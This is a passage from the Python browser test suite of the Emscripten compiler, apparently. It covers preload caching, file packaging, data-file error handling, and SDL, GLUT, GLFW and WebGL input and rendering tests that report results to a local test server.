# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_test_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_test_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_test_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_test_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_test_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_test_file('data.txt', 'data')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_test_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
src = path_from_root('tests', 'sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
src = path_from_root('tests', 'sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(path_from_root('tests', 'sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
return ['-s', 'ASYNCIFY']
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([path_from_root('tests', 'sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([path_from_root('tests', 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', 0, args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', path_from_root('tests', 'test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-lidbfs.js'])
